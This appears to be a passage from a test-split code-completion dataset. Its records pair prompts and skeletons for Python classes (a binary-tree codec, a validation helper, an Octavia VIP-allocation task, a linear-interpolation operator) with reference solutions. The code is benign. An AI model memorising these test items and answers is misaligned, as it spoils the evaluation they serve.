constructTree(inorderList[:r_index], preorderList)\n root.right = constructTree(inorderList[r_index + 1:], preorderList)\n return root\n inorder, preorder = tuple(data.split('/'))\n return constructTree([int(s) for s in inorder], [int(s) for s in preorder])\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000079", "length_bytes": 2710, "license_type": "no_license", "methods": [{"docstring": "Encodes a tree to a single string. :type root: TreeNode :rtype: str", "name": "serialize", "signature": "def serialize(self, root)"}, {"docstring": "Decodes your encoded data to tree. :type data: str :rtype: TreeNode", "name": "deserialize", "signature": "def deserialize(self, data)"}], "n_methods": 2, "prompt": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root): Encodes a tree to a single string. :type root: TreeNode :rtype: str\n- def deserialize(self, data): Decodes your encoded data to tree. :type data: str :rtype: TreeNode", "prompted_full_text": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root): Encodes a tree to a single string. :type root: TreeNode :rtype: str\n- def deserialize(self, data): Decodes your encoded data to tree. :type data: str :rtype: TreeNode\n\n<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. 
:type root: TreeNode :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def inorderSerialize(node):\n if not node:\n return ''\n return inorderSerialize(node.left) + str(node.val) + inorderSerialize(node.right)\n\n def preorderSerialize(node):\n if not node:\n return ''\n return str(node.val) + preorderSerialize(node.left) + preorderSerialize(node.right)\n s1 = s2 = root\n return inorderSerialize(s1) + '/' + preorderSerialize(s2)\n<|end_body_0|>\n\n<|body_start_1|>\n def constructTree(inorderList, preorderList):\n if not inorderList:\n return None\n r_val = preorderList.pop(0)\n r_index = inorderList.index(r_val)\n root = TreeNode(r_val)\n root.left = constructTree(inorderList[:r_index], preorderList)\n root.right = constructTree(inorderList[r_index + 1:], preorderList)\n return root\n inorder, preorder = tuple(data.split('/'))\n return constructTree([int(s) for s in inorder], [int(s) for s in preorder])\n<|end_body_1|>\n", "revision_id": "1461b10b8910fa90a311939c6df9082a8526f9b1", "skeleton": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: TreeNode :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Codec:\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: TreeNode :rtype: str\"\"\"\n def inorderSerialize(node):\n if not node:\n return ''\n return inorderSerialize(node.left) + str(node.val) + inorderSerialize(node.right)\n\n def preorderSerialize(node):\n if not node:\n return ''\n return str(node.val) + preorderSerialize(node.left) + preorderSerialize(node.right)\n s1 = s2 = root\n return inorderSerialize(s1) + '/' + preorderSerialize(s2)\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. 
:type data: str :rtype: TreeNode\"\"\"\n        def constructTree(inorderList, preorderList):\n            if not inorderList:\n                return None\n            r_val = preorderList.pop(0)\n            r_index = inorderList.index(r_val)\n            root = TreeNode(r_val)\n            root.left = constructTree(inorderList[:r_index], preorderList)\n            root.right = constructTree(inorderList[r_index + 1:], preorderList)\n            return root\n        inorder, preorder = tuple(data.split('/'))\n        return constructTree([int(s) for s in inorder], [int(s) for s in preorder])\n", "source": "the_stack_v2_python_sparse", "source_path": "Hard/297_serialize&DeserializeBinaryTree.py", "source_repo": "Yucheng7713/CodingPracticeByYuch", "split": "test", "star_events_count": 0} {"blob_id": "aa8e640e78b3314d2df0cdb2c0228830056cab9d", "bodies": ["if isinstance(x, valid_type):\n    pass\nelse:\n    raise TypeError(f'Expected type of {x} is an instance of {valid_type}, but got ``{type(x)}``.')", "if x in valid_value:\n    pass\nelse:\n    raise ValueError(f'Expected `x` is one of {valid_value}, but got ``{x}``.')", "out = []\nfor each in args:\n    if isinstance(each, np.ndarray):\n        each = torch.tensor(each, device=device)\n    elif isinstance(each, torch.Tensor):\n        each = each.to(device=device)\n    else:\n        raise TypeError(f'Expected type of the args is ``np.ndarray` or ``torch.Tensor``, but got ``{type(each)}``.')\n    out.append(each)\nif len(out) > 1:\n    return tuple(out)\nelse:\n    return out[0]"], "bodies_text": "<|body_start_0|>\n    if isinstance(x, valid_type):\n        pass\n    else:\n        raise TypeError(f'Expected type of {x} is an instance of {valid_type}, but got ``{type(x)}``.')\n<|end_body_0|>\n\n<|body_start_1|>\n    if x in valid_value:\n        pass\n    else:\n        raise ValueError(f'Expected `x` is one of {valid_value}, but got ``{x}``.')\n<|end_body_1|>\n\n<|body_start_2|>\n    out = []\n    for each in args:\n        if isinstance(each, np.ndarray):\n            each = torch.tensor(each, device=device)\n        elif isinstance(each, torch.Tensor):\n            each = each.to(device=device)\n        else:\n            raise TypeError(f'Expected type of the args is ``np.ndarray` or ``torch.Tensor``, but got ``{type(each)}``.')\n        out.append(each)\n    if len(out) > 1:\n        return tuple(out)\n    else:\n        return out[0]\n<|end_body_2|>\n", "class_docstring": "A class for Parameters Validation Check whether the parameters are valid, including parameter types and parameter values.", "class_name": "Validation", "detected_licenses": ["Apache-2.0", "BSD-3-Clause", "MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Validation:\n    \"\"\"A class for Parameters Validation Check whether the parameters are valid, including parameter types and parameter values.\"\"\"\n\n    def validate_type(x, valid_type):\n        \"\"\"Check whether an object is an instance of `valid_type`. Parameters ---------- x: object object to be verified valid_type: type or tuple of type A tuple, as in ``validate_type(x, (A, B, ...))``, may be given as the target to check against. This is equivalent to ``validate_type(x, A) or validate_type(x, B) or ...`` etc. Returns ------- out: True or raise TypeError\"\"\"\n        <|body_0|>\n\n    def validate_value(x, valid_value):\n        \"\"\"Check whether an object's value is one of `valid_value`. Parameters ---------- x: object object to be verified valid_value: tuple, list A tuple, as in ``validate_value(x, (A, B, ...))``, may be given as the target to check against. This is equivalent to ``validate_value(x, A) or validate_value(x, B) or ...`` etc. 
Returns ------- out: True or raise TypeError\"\"\"\n        <|body_1|>\n\n    def to_device(*args, device=None):\n        \"\"\"transfer all of ``args`` to ``device``\"\"\"\n        <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n    if isinstance(x, valid_type):\n        pass\n    else:\n        raise TypeError(f'Expected type of {x} is an instance of {valid_type}, but got ``{type(x)}``.')\n<|end_body_0|>\n\n<|body_start_1|>\n    if x in valid_value:\n        pass\n    else:\n        raise ValueError(f'Expected `x` is one of {valid_value}, but got ``{x}``.')\n<|end_body_1|>\n\n<|body_start_2|>\n    out = []\n    for each in args:\n        if isinstance(each, np.ndarray):\n            each = torch.tensor(each, device=device)\n        elif isinstance(each, torch.Tensor):\n            each = each.to(device=device)\n        else:\n            raise TypeError(f'Expected type of the args is ``np.ndarray` or ``torch.Tensor``, but got ``{type(each)}``.')\n        out.append(each)\n    if len(out) > 1:\n        return tuple(out)\n    else:\n        return out[0]\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000080", "length_bytes": 3049, "license_type": "permissive", "methods": [{"docstring": "Check whether an object is an instance of `valid_type`. Parameters ---------- x: object object to be verified valid_type: type or tuple of type A tuple, as in ``validate_type(x, (A, B, ...))``, may be given as the target to check against. This is equivalent to ``validate_type(x, A) or validate_type(x, B) or ...`` etc. Returns ------- out: True or raise TypeError", "name": "validate_type", "signature": "def validate_type(x, valid_type)"}, {"docstring": "Check whether an object's value is one of `valid_value`. Parameters ---------- x: object object to be verified valid_value: tuple, list A tuple, as in ``validate_value(x, (A, B, ...))``, may be given as the target to check against. This is equivalent to ``validate_value(x, A) or validate_value(x, B) or ...`` etc. Returns ------- out: True or raise TypeError", "name": "validate_value", "signature": "def validate_value(x, valid_value)"}, {"docstring": "transfer all of ``args`` to ``device``", "name": "to_device", "signature": "def to_device(*args, device=None)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_test_000310", "prompt": "Implement the Python class `Validation` described below.\n\nClass description:\nA class for Parameters Validation Check whether the parameters are valid, including parameter types and parameter values.\n\nMethod signatures and docstrings:\n- def validate_type(x, valid_type): Check whether an object is an instance of `valid_type`. Parameters ---------- x: object object to be verified valid_type: type or tuple of type A tuple, as in ``validate_type(x, (A, B, ...))``, may be given as the target to check against. This is equivalent to ``validate_type(x, A) or validate_type(x, B) or ...`` etc. Returns ------- out: True or raise TypeError\n- def validate_value(x, valid_value): Check whether an object's value is one of `valid_value`. Parameters ---------- x: object object to be verified valid_value: tuple, list A tuple, as in ``validate_value(x, (A, B, ...))``, may be given as the target to check against. This is equivalent to ``validate_value(x, A) or validate_value(x, B) or ...`` etc. 
Returns ------- out: True or raise TypeError\n- def to_device(*args, device=None): transfer all of ``args`` to ``device``", "prompted_full_text": "Implement the Python class `Validation` described below.\n\nClass description:\nA class for Parameters Validation Check whether the parameters are valid, including parameter types and parameter values.\n\nMethod signatures and docstrings:\n- def validate_type(x, valid_type): Check whether an object is an instance of `valid_type`. Parameters ---------- x: object object to be verified valid_type: type or tuple of type A tuple, as in ``validate_type(x, (A, B, ...))``, may be given as the target to check against. This is equivalent to ``validate_type(x, A) or validate_type(x, B) or ...`` etc. Returns ------- out: True or raise TypeError\n- def validate_value(x, valid_value): Check whether an object's value is one of `valid_value`. Parameters ---------- x: object object to be verified valid_value: tuple, list A tuple, as in ``validate_value(x, (A, B, ...))``, may be given as the target to check against. This is equivalent to ``validate_value(x, A) or validate_value(x, B) or ...`` etc. Returns ------- out: True or raise TypeError\n- def to_device(*args, device=None): transfer all of ``args`` to ``device``\n\n<|skeleton|>\nclass Validation:\n    \"\"\"A class for Parameters Validation Check whether the parameters are valid, including parameter types and parameter values.\"\"\"\n\n    def validate_type(x, valid_type):\n        \"\"\"Check whether an object is an instance of `valid_type`. Parameters ---------- x: object object to be verified valid_type: type or tuple of type A tuple, as in ``validate_type(x, (A, B, ...))``, may be given as the target to check against. This is equivalent to ``validate_type(x, A) or validate_type(x, B) or ...`` etc. Returns ------- out: True or raise TypeError\"\"\"\n        <|body_0|>\n\n    def validate_value(x, valid_value):\n        \"\"\"Check whether an object's value is one of `valid_value`. Parameters ---------- x: object object to be verified valid_value: tuple, list A tuple, as in ``validate_value(x, (A, B, ...))``, may be given as the target to check against. This is equivalent to ``validate_value(x, A) or validate_value(x, B) or ...`` etc. Returns ------- out: True or raise TypeError\"\"\"\n        <|body_1|>\n\n    def to_device(*args, device=None):\n        \"\"\"transfer all of ``args`` to ``device``\"\"\"\n        <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n    if isinstance(x, valid_type):\n        pass\n    else:\n        raise TypeError(f'Expected type of {x} is an instance of {valid_type}, but got ``{type(x)}``.')\n<|end_body_0|>\n\n<|body_start_1|>\n    if x in valid_value:\n        pass\n    else:\n        raise ValueError(f'Expected `x` is one of {valid_value}, but got ``{x}``.')\n<|end_body_1|>\n\n<|body_start_2|>\n    out = []\n    for each in args:\n        if isinstance(each, np.ndarray):\n            each = torch.tensor(each, device=device)\n        elif isinstance(each, torch.Tensor):\n            each = each.to(device=device)\n        else:\n            raise TypeError(f'Expected type of the args is ``np.ndarray` or ``torch.Tensor``, but got ``{type(each)}``.')\n        out.append(each)\n    if len(out) > 1:\n        return tuple(out)\n    else:\n        return out[0]\n<|end_body_2|>\n", "revision_id": "238cbc41865ddf629bb6ae92c2e1445be27f98b8", "skeleton": "<|skeleton|>\nclass Validation:\n    \"\"\"A class for Parameters Validation Check whether the parameters are valid, including parameter types and parameter values.\"\"\"\n\n    def validate_type(x, valid_type):\n        \"\"\"Check whether an object is an instance of `valid_type`. 
Parameters ---------- x: object object to be verified valid_type: type or tuple of type A tuple, as in ``validate_type(x, (A, B, ...))``, may be given as the target to check against. This is equivalent to ``validate_type(x, A) or validate_type(x, B) or ...`` etc. Returns ------- out: True or raise TypeError\"\"\"\n        <|body_0|>\n\n    def validate_value(x, valid_value):\n        \"\"\"Check whether an object's value is one of `valid_value`. Parameters ---------- x: object object to be verified valid_value: tuple, list A tuple, as in ``validate_value(x, (A, B, ...))``, may be given as the target to check against. This is equivalent to ``validate_value(x, A) or validate_value(x, B) or ...`` etc. Returns ------- out: True or raise TypeError\"\"\"\n        <|body_1|>\n\n    def to_device(*args, device=None):\n        \"\"\"transfer all of ``args`` to ``device``\"\"\"\n        <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Validation:\n    \"\"\"A class for Parameters Validation Check whether the parameters are valid, including parameter types and parameter values.\"\"\"\n\n    def validate_type(x, valid_type):\n        \"\"\"Check whether an object is an instance of `valid_type`. Parameters ---------- x: object object to be verified valid_type: type or tuple of type A tuple, as in ``validate_type(x, (A, B, ...))``, may be given as the target to check against. This is equivalent to ``validate_type(x, A) or validate_type(x, B) or ...`` etc. Returns ------- out: True or raise TypeError\"\"\"\n        if isinstance(x, valid_type):\n            pass\n        else:\n            raise TypeError(f'Expected type of {x} is an instance of {valid_type}, but got ``{type(x)}``.')\n\n    def validate_value(x, valid_value):\n        \"\"\"Check whether an object's value is one of `valid_value`. Parameters ---------- x: object object to be verified valid_value: tuple, list A tuple, as in ``validate_value(x, (A, B, ...))``, may be given as the target to check against. This is equivalent to ``validate_value(x, A) or validate_value(x, B) or ...`` etc. 
Returns ------- out: True or raise TypeError\"\"\"\n if x in valid_value:\n pass\n else:\n raise ValueError(f'Expected `x` is one of {valid_value}, but got ``{x}``.')\n\n def to_device(*args, device=None):\n \"\"\"transfer all of ``args`` to ``device``\"\"\"\n out = []\n for each in args:\n if isinstance(each, np.ndarray):\n each = torch.tensor(each, device=device)\n elif isinstance(each, torch.Tensor):\n each = each.to(device=device)\n else:\n raise TypeError(f'Expected type of the args is ``np.ndarray` or ``torch.Tensor``, but got ``{type(each)}``.')\n out.append(each)\n if len(out) > 1:\n return tuple(out)\n else:\n return out[0]\n", "source": "the_stack_v2_python_sparse", "source_path": "gcastle/castle/algorithms/gradient/corl/torch/utils/validation.py", "source_repo": "huawei-noah/trustworthyAI", "split": "test", "star_events_count": 832} {"blob_id": "0101cb4e170a8d168a24134fee231c0d44274d44", "bodies": ["LOG.debug('Allocating vip with port id %s, subnet id %s, ip address %s for load balancer %s', loadbalancer[constants.VIP_PORT_ID], loadbalancer[constants.VIP_SUBNET_ID], loadbalancer[constants.VIP_ADDRESS], loadbalancer[constants.LOADBALANCER_ID])\nsession = db_apis.get_session()\nwith session.begin():\n db_lb = self.loadbalancer_repo.get(session, id=loadbalancer[constants.LOADBALANCER_ID])\nvip, additional_vips = self.network_driver.allocate_vip(db_lb)\nLOG.info('Allocated vip with port id %s, subnet id %s, ip address %s for load balancer %s', loadbalancer[constants.VIP_PORT_ID], loadbalancer[constants.VIP_SUBNET_ID], loadbalancer[constants.VIP_ADDRESS], loadbalancer[constants.LOADBALANCER_ID])\nfor add_vip in additional_vips:\n LOG.debug('Allocated an additional VIP: subnet=%(subnet)s ip_address=%(ip)s', {'subnet': add_vip.subnet_id, 'ip': add_vip.ip_address})\nreturn (vip.to_dict(), [additional_vip.to_dict() for additional_vip in additional_vips])", "if isinstance(result, failure.Failure):\n LOG.exception('Unable to allocate VIP')\n return\nvip, additional_vips = result\nvip = data_models.Vip(**vip)\nLOG.warning('Deallocating vip %s', vip.ip_address)\ntry:\n self.network_driver.deallocate_vip(vip)\nexcept Exception as e:\n LOG.error('Failed to deallocate VIP. 
Resources may still be in use from vip: %(vip)s due to error: %(except)s', {'vip': vip.ip_address, 'except': str(e)})"], "bodies_text": "<|body_start_0|>\n LOG.debug('Allocating vip with port id %s, subnet id %s, ip address %s for load balancer %s', loadbalancer[constants.VIP_PORT_ID], loadbalancer[constants.VIP_SUBNET_ID], loadbalancer[constants.VIP_ADDRESS], loadbalancer[constants.LOADBALANCER_ID])\n session = db_apis.get_session()\n with session.begin():\n db_lb = self.loadbalancer_repo.get(session, id=loadbalancer[constants.LOADBALANCER_ID])\n vip, additional_vips = self.network_driver.allocate_vip(db_lb)\n LOG.info('Allocated vip with port id %s, subnet id %s, ip address %s for load balancer %s', loadbalancer[constants.VIP_PORT_ID], loadbalancer[constants.VIP_SUBNET_ID], loadbalancer[constants.VIP_ADDRESS], loadbalancer[constants.LOADBALANCER_ID])\n for add_vip in additional_vips:\n LOG.debug('Allocated an additional VIP: subnet=%(subnet)s ip_address=%(ip)s', {'subnet': add_vip.subnet_id, 'ip': add_vip.ip_address})\n return (vip.to_dict(), [additional_vip.to_dict() for additional_vip in additional_vips])\n<|end_body_0|>\n\n<|body_start_1|>\n if isinstance(result, failure.Failure):\n LOG.exception('Unable to allocate VIP')\n return\n vip, additional_vips = result\n vip = data_models.Vip(**vip)\n LOG.warning('Deallocating vip %s', vip.ip_address)\n try:\n self.network_driver.deallocate_vip(vip)\n except Exception as e:\n LOG.error('Failed to deallocate VIP. Resources may still be in use from vip: %(vip)s due to error: %(except)s', {'vip': vip.ip_address, 'except': str(e)})\n<|end_body_1|>\n", "class_docstring": "Task to allocate a VIP.", "class_name": "AllocateVIP", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AllocateVIP:\n \"\"\"Task to allocate a VIP.\"\"\"\n\n def execute(self, loadbalancer):\n \"\"\"Allocate a vip to the loadbalancer.\"\"\"\n <|body_0|>\n\n def revert(self, result, loadbalancer, *args, **kwargs):\n \"\"\"Handle a failure to allocate vip.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n LOG.debug('Allocating vip with port id %s, subnet id %s, ip address %s for load balancer %s', loadbalancer[constants.VIP_PORT_ID], loadbalancer[constants.VIP_SUBNET_ID], loadbalancer[constants.VIP_ADDRESS], loadbalancer[constants.LOADBALANCER_ID])\n session = db_apis.get_session()\n with session.begin():\n db_lb = self.loadbalancer_repo.get(session, id=loadbalancer[constants.LOADBALANCER_ID])\n vip, additional_vips = self.network_driver.allocate_vip(db_lb)\n LOG.info('Allocated vip with port id %s, subnet id %s, ip address %s for load balancer %s', loadbalancer[constants.VIP_PORT_ID], loadbalancer[constants.VIP_SUBNET_ID], loadbalancer[constants.VIP_ADDRESS], loadbalancer[constants.LOADBALANCER_ID])\n for add_vip in additional_vips:\n LOG.debug('Allocated an additional VIP: subnet=%(subnet)s ip_address=%(ip)s', {'subnet': add_vip.subnet_id, 'ip': add_vip.ip_address})\n return (vip.to_dict(), [additional_vip.to_dict() for additional_vip in additional_vips])\n<|end_body_0|>\n\n<|body_start_1|>\n if isinstance(result, failure.Failure):\n LOG.exception('Unable to allocate VIP')\n return\n vip, additional_vips = result\n vip = data_models.Vip(**vip)\n LOG.warning('Deallocating vip %s', vip.ip_address)\n try:\n self.network_driver.deallocate_vip(vip)\n except Exception as e:\n LOG.error('Failed to deallocate VIP. 
Resources may still be in use from vip: %(vip)s due to error: %(except)s', {'vip': vip.ip_address, 'except': str(e)})\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000081", "length_bytes": 44034, "license_type": "permissive", "methods": [{"docstring": "Allocate a vip to the loadbalancer.", "name": "execute", "signature": "def execute(self, loadbalancer)"}, {"docstring": "Handle a failure to allocate vip.", "name": "revert", "signature": "def revert(self, result, loadbalancer, *args, **kwargs)"}], "n_methods": 2, "prompt": "Implement the Python class `AllocateVIP` described below.\n\nClass description:\nTask to allocate a VIP.\n\nMethod signatures and docstrings:\n- def execute(self, loadbalancer): Allocate a vip to the loadbalancer.\n- def revert(self, result, loadbalancer, *args, **kwargs): Handle a failure to allocate vip.", "prompted_full_text": "Implement the Python class `AllocateVIP` described below.\n\nClass description:\nTask to allocate a VIP.\n\nMethod signatures and docstrings:\n- def execute(self, loadbalancer): Allocate a vip to the loadbalancer.\n- def revert(self, result, loadbalancer, *args, **kwargs): Handle a failure to allocate vip.\n\n<|skeleton|>\nclass AllocateVIP:\n \"\"\"Task to allocate a VIP.\"\"\"\n\n def execute(self, loadbalancer):\n \"\"\"Allocate a vip to the loadbalancer.\"\"\"\n <|body_0|>\n\n def revert(self, result, loadbalancer, *args, **kwargs):\n \"\"\"Handle a failure to allocate vip.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n LOG.debug('Allocating vip with port id %s, subnet id %s, ip address %s for load balancer %s', loadbalancer[constants.VIP_PORT_ID], loadbalancer[constants.VIP_SUBNET_ID], loadbalancer[constants.VIP_ADDRESS], loadbalancer[constants.LOADBALANCER_ID])\n session = db_apis.get_session()\n with session.begin():\n db_lb = self.loadbalancer_repo.get(session, id=loadbalancer[constants.LOADBALANCER_ID])\n vip, additional_vips = self.network_driver.allocate_vip(db_lb)\n LOG.info('Allocated vip with port id %s, subnet id %s, ip address %s for load balancer %s', loadbalancer[constants.VIP_PORT_ID], loadbalancer[constants.VIP_SUBNET_ID], loadbalancer[constants.VIP_ADDRESS], loadbalancer[constants.LOADBALANCER_ID])\n for add_vip in additional_vips:\n LOG.debug('Allocated an additional VIP: subnet=%(subnet)s ip_address=%(ip)s', {'subnet': add_vip.subnet_id, 'ip': add_vip.ip_address})\n return (vip.to_dict(), [additional_vip.to_dict() for additional_vip in additional_vips])\n<|end_body_0|>\n\n<|body_start_1|>\n if isinstance(result, failure.Failure):\n LOG.exception('Unable to allocate VIP')\n return\n vip, additional_vips = result\n vip = data_models.Vip(**vip)\n LOG.warning('Deallocating vip %s', vip.ip_address)\n try:\n self.network_driver.deallocate_vip(vip)\n except Exception as e:\n LOG.error('Failed to deallocate VIP. 
Resources may still be in use from vip: %(vip)s due to error: %(except)s', {'vip': vip.ip_address, 'except': str(e)})\n<|end_body_1|>\n", "revision_id": "0426285a41464a5015494584f109eed35a0d44db", "skeleton": "<|skeleton|>\nclass AllocateVIP:\n \"\"\"Task to allocate a VIP.\"\"\"\n\n def execute(self, loadbalancer):\n \"\"\"Allocate a vip to the loadbalancer.\"\"\"\n <|body_0|>\n\n def revert(self, result, loadbalancer, *args, **kwargs):\n \"\"\"Handle a failure to allocate vip.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AllocateVIP:\n \"\"\"Task to allocate a VIP.\"\"\"\n\n def execute(self, loadbalancer):\n \"\"\"Allocate a vip to the loadbalancer.\"\"\"\n LOG.debug('Allocating vip with port id %s, subnet id %s, ip address %s for load balancer %s', loadbalancer[constants.VIP_PORT_ID], loadbalancer[constants.VIP_SUBNET_ID], loadbalancer[constants.VIP_ADDRESS], loadbalancer[constants.LOADBALANCER_ID])\n session = db_apis.get_session()\n with session.begin():\n db_lb = self.loadbalancer_repo.get(session, id=loadbalancer[constants.LOADBALANCER_ID])\n vip, additional_vips = self.network_driver.allocate_vip(db_lb)\n LOG.info('Allocated vip with port id %s, subnet id %s, ip address %s for load balancer %s', loadbalancer[constants.VIP_PORT_ID], loadbalancer[constants.VIP_SUBNET_ID], loadbalancer[constants.VIP_ADDRESS], loadbalancer[constants.LOADBALANCER_ID])\n for add_vip in additional_vips:\n LOG.debug('Allocated an additional VIP: subnet=%(subnet)s ip_address=%(ip)s', {'subnet': add_vip.subnet_id, 'ip': add_vip.ip_address})\n return (vip.to_dict(), [additional_vip.to_dict() for additional_vip in additional_vips])\n\n def revert(self, result, loadbalancer, *args, **kwargs):\n \"\"\"Handle a failure to allocate vip.\"\"\"\n if isinstance(result, failure.Failure):\n LOG.exception('Unable to allocate VIP')\n return\n vip, additional_vips = result\n vip = data_models.Vip(**vip)\n LOG.warning('Deallocating vip %s', vip.ip_address)\n try:\n self.network_driver.deallocate_vip(vip)\n except Exception as e:\n LOG.error('Failed to deallocate VIP. 
Resources may still be in use from vip: %(vip)s due to error: %(except)s', {'vip': vip.ip_address, 'except': str(e)})\n", "source": "the_stack_v2_python_sparse", "source_path": "octavia/controller/worker/v2/tasks/network_tasks.py", "source_repo": "openstack/octavia", "split": "test", "star_events_count": 147} {"blob_id": "897eabf748f70b3612138f4a7e1f4baf5eb37d79", "bodies": ["self.__nm = nm\nself.__om = om\nself.__dm = dm\nself.__nd = len(crd)\nself.__crd = crd\nif self.__crd.shape[0] != self.__nd:\n raise Exception('coordinate array must be same length as data')", "if mod.shape[0] != self.__nm or dat.shape[0] != self.__nd:\n raise Exception('lint forward: input shapes do not match those passed to constructor')\nif add == False:\n dat[:] = 0.0\nforward_lint(self.__om, self.__dm, self.__nm, self.__nd, self.__crd, mod, dat)", "if mod.shape[0] != self.__nm or dat.shape[0] != self.__nd:\n raise Exception('lint adjoint: input shapes do not match those passed to constructor')\nif add == False:\n mod[:] = 0.0\nadjoint_lint(self.__om, self.__dm, self.__nm, self.__nd, self.__crd, mod, dat)", "m = np.random.rand(self.__nm).astype('float32')\nmh = np.zeros(self.__nm, dtype='float32')\nd = np.random.rand(self.__nd).astype('float32')\ndh = np.zeros(self.__nd, dtype='float32')\nif add:\n self.forward(True, m, dh)\n self.adjoint(True, mh, d)\n dotm = np.dot(m, mh)\n dotd = np.dot(d, dh)\n print('Dot product test (add==True):')\n print('Dotm = %f Dotd = %f' % (dotm, dotd))\n print('Absolute error = %f' % abs(dotm - dotd))\n print('Relative error = %f' % (abs(dotm - dotd) / dotd))\nelse:\n self.forward(False, m, dh)\n self.adjoint(False, mh, d)\n dotm = np.dot(m, mh)\n dotd = np.dot(d, dh)\n print('Dot product test (add==False):')\n print('Dotm = %f Dotd = %f' % (dotm, dotd))\n print('Absolute error = %f' % abs(dotm - dotd))\n print('Relative error = %f' % (abs(dotm - dotd) / dotd))"], "bodies_text": "<|body_start_0|>\n self.__nm = nm\n self.__om = om\n self.__dm = dm\n self.__nd = len(crd)\n self.__crd = crd\n if self.__crd.shape[0] != self.__nd:\n raise Exception('coordinate array must be same length as data')\n<|end_body_0|>\n\n<|body_start_1|>\n if mod.shape[0] != self.__nm or dat.shape[0] != self.__nd:\n raise Exception('lint forward: input shapes do not match those passed to constructor')\n if add == False:\n dat[:] = 0.0\n forward_lint(self.__om, self.__dm, self.__nm, self.__nd, self.__crd, mod, dat)\n<|end_body_1|>\n\n<|body_start_2|>\n if mod.shape[0] != self.__nm or dat.shape[0] != self.__nd:\n raise Exception('lint adjoint: input shapes do not match those passed to constructor')\n if add == False:\n mod[:] = 0.0\n adjoint_lint(self.__om, self.__dm, self.__nm, self.__nd, self.__crd, mod, dat)\n<|end_body_2|>\n\n<|body_start_3|>\n m = np.random.rand(self.__nm).astype('float32')\n mh = np.zeros(self.__nm, dtype='float32')\n d = np.random.rand(self.__nd).astype('float32')\n dh = np.zeros(self.__nd, dtype='float32')\n if add:\n self.forward(True, m, dh)\n self.adjoint(True, mh, d)\n dotm = np.dot(m, mh)\n dotd = np.dot(d, dh)\n print('Dot product test (add==True):')\n print('Dotm = %f Dotd = %f' % (dotm, dotd))\n print('Absolute error = %f' % abs(dotm - dotd))\n print('Relative error = %f' % (abs(dotm - dotd) / dotd))\n else:\n self.forward(False, m, dh)\n self.adjoint(False, mh, d)\n dotm = np.dot(m, mh)\n dotd = np.dot(d, dh)\n print('Dot product test (add==False):')\n print('Dotm = %f Dotd = %f' % (dotm, dotd))\n print('Absolute error = %f' % abs(dotm - dotd))\n print('Relative error = %f' % 
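Editor's note on the AllocateVIP record above: its revert() illustrates the execute/revert contract of a flow task; revert receives either execute's result or a failure marker, and must only deallocate when allocation actually happened. A minimal sketch of that guard, where Failure and FakeDriver are hypothetical stand-ins (the record's real failure.Failure and network driver are not shown):

class Failure:
    # hypothetical stand-in for the failure marker revert() checks
    pass

class FakeDriver:
    # hypothetical stand-in for the network driver used by AllocateVIP
    def allocate_vip(self, lb):
        return ({'ip_address': '203.0.113.10'}, [])

    def deallocate_vip(self, vip):
        print('deallocating', vip['ip_address'])

def revert(result, driver):
    # mirrors the guard in the record: a Failure means allocation never
    # completed, so there is nothing to deallocate
    if isinstance(result, Failure):
        print('Unable to allocate VIP; nothing to revert')
        return
    vip, _additional_vips = result
    driver.deallocate_vip(vip)

driver = FakeDriver()
revert(driver.allocate_vip(None), driver)  # cleans up the allocated VIP
revert(Failure(), driver)                  # no-op when execute() failed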
(abs(dotm - dotd) / dotd))\n<|end_body_3|>\n", "class_docstring": "A linear interpolation operator", "class_name": "lint", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass lint:\n \"\"\"A linear interpolation operator\"\"\"\n\n def __init__(self, nm, om, dm, crd):\n \"\"\"lint constructor Parameters: nm - size of model (regularly sampled) om - origin of model axis dm - sampling of model axis nd - size of data (irregularly sampled) crd - input coordinates of the values (of the irregularly sampled data)\"\"\"\n <|body_0|>\n\n def forward(self, add, mod, dat):\n \"\"\"Applies the forward linear interpolation operator Parameters: add - whether to add to the input (True/False) mod - input model numpy array dat - input data numpy array\"\"\"\n <|body_1|>\n\n def adjoint(self, add, mod, dat):\n \"\"\"Applies the adjoint transient convolution operator Parameters add - whether to add to the input (True/False) mod - output model numpy array dat - input data numpy array\"\"\"\n <|body_2|>\n\n def dottest(self, add=False):\n \"\"\"Performs the dot product test of the operator\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.__nm = nm\n self.__om = om\n self.__dm = dm\n self.__nd = len(crd)\n self.__crd = crd\n if 